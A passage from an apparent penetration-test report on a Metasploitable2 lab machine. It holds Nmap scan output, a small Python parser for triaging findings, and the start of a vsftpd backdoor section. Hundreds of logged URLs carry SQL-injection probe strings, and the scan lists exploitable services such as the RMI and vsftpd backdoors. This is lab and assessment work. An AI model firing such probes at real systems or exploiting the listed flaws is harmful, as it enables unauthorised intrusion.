| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| Possible sqli for forms:
| Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
|_ initials
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
| rmi-vuln-classloader:
| VULNERABLE:
| RMI registry default configuration remote code execution vulnerability
| State: VULNERABLE
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|
| References:
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
5432/tcp open postgresql
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:
5900/tcp open vnc
|_sslv2-drown:
6000/tcp open X11
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8009/tcp open ajp13
8180/tcp open unknown
| http-cookie-flags:
| /admin/:
| JSESSIONID:
| httponly flag not set
| /admin/index.html:
| JSESSIONID:
| httponly flag not set
| /admin/login.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin.html:
| JSESSIONID:
| httponly flag not set
| /admin/account.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.html:
| JSESSIONID:
| httponly flag not set
| /admin/home.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.html:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.html:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.html:
| JSESSIONID:
| httponly flag not set
| /admin/cp.html:
| JSESSIONID:
| httponly flag not set
| /admin/index.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/home.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/cp.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/account.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/jscript/upload.html:
| JSESSIONID:
|_ httponly flag not set
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /admin/login.html: Possible admin folder
| /admin/admin.html: Possible admin folder
| /admin/account.html: Possible admin folder
| /admin/admin_login.html: Possible admin folder
| /admin/home.html: Possible admin folder
| /admin/admin-login.html: Possible admin folder
| /admin/adminLogin.html: Possible admin folder
| /admin/controlpanel.html: Possible admin folder
| /admin/cp.html: Possible admin folder
| /admin/index.jsp: Possible admin folder
| /admin/login.jsp: Possible admin folder
| /admin/admin.jsp: Possible admin folder
| /admin/home.jsp: Possible admin folder
| /admin/controlpanel.jsp: Possible admin folder
| /admin/admin-login.jsp: Possible admin folder
| /admin/cp.jsp: Possible admin folder
| /admin/account.jsp: Possible admin folder
| /admin/admin_login.jsp: Possible admin folder
| /admin/adminLogin.jsp: Possible admin folder
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_ /webdav/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$

The above output lists the vulnerabilities found on the target. From this list we will focus on the FTP service (vsftpd), whose relevant excerpt is repeated below, and carry out the vulnerability analysis on it.
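A scan log as long as the one above is easier to act on once the VULNERABLE blocks are pulled out into a triage list. The Python snippet below is an added example and is not part of the original report: it parses Nmap normal output, collects every NSE block marked VULNERABLE together with its port, script name, state and any CVE ids, and orders the results for follow-up. The embedded scan text is a constructed, trimmed excerpt in the shape of the real output above, written with Nmap's standard indentation (which the parser relies on to tell a script header from its indented sub-lines); the names `Finding`, `parse_findings` and `triage` are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed excerpt in the shape of the Nmap output above,
# with standard Nmap indentation (script header at column 2, details indented).
SAMPLE_NMAP = """\
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-vsftpd-backdoor:
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|_sslv2-drown:
80/tcp   open  http
|_http-trace: TRACE is enabled
5432/tcp open  postgresql
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|_    IDs:  BID:70574  CVE:CVE-2014-3566
8180/tcp open  unknown
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|_    IDs:  CVE:CVE-2007-6750
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+\S+\s+(\S+)")   # "21/tcp   open  ftp"
SCRIPT_RE = re.compile(r"^\|_? ?([\w-]+):")               # "| ftp-vsftpd-backdoor:"
STATE_RE = re.compile(r"^State:\s*(.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Finding:
    port: str
    service: str
    script: str
    title: str
    state: str = ""
    cves: list = field(default_factory=list)


def parse_findings(text):
    """Return one Finding per 'VULNERABLE:' block in Nmap normal output."""
    findings = []
    port = service = script = None
    current = None        # Finding currently being filled in
    expect_title = False  # the line right after 'VULNERABLE:' names the issue
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            port, service = f"{m.group(1)}/{m.group(2)}", m.group(3)
            script, current = None, None
            continue
        if not raw.startswith("|"):
            continue                      # not NSE output (MAC line, blanks, ...)
        m = SCRIPT_RE.match(raw)
        if m:                             # new script header resets the context
            script, current = m.group(1), None
            continue
        body = raw.lstrip("|_ ").strip()
        if body == "VULNERABLE:":
            expect_title = True
            continue
        if expect_title:
            current = Finding(port, service, script, body)
            findings.append(current)
            expect_title = False
            continue
        if current is None:
            continue
        m = STATE_RE.match(body)
        if m:
            current.state = m.group(1)
        for cve in CVE_RE.findall(body):  # IDs lines and reference URLs alike
            if cve not in current.cves:
                current.cves.append(cve)
    return findings


def triage(findings):
    """Order for follow-up: exploitable first, then CVE-tagged, then the rest; by port within each."""
    def rank(f):
        bucket = 0 if "Exploitable" in f.state else (1 if f.cves else 2)
        return (bucket, int(f.port.split("/")[0]))
    return sorted(findings, key=rank)


if __name__ == "__main__":
    for f in triage(parse_findings(SAMPLE_NMAP)):
        print(f"{f.port:<9} {f.script:<22} {f.state:<26} {','.join(f.cves) or '-':<14} {f.title}")
```

Feed it the saved scan file (`parse_findings(open("vuln.txt").read())`) and the output becomes the starting point of the findings table; the vsftpd block sorts to the top because its state is the only one Nmap marks as Exploitable.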



PORT     STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
|_sslv2-drown:




The Attack Procedure


We can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.

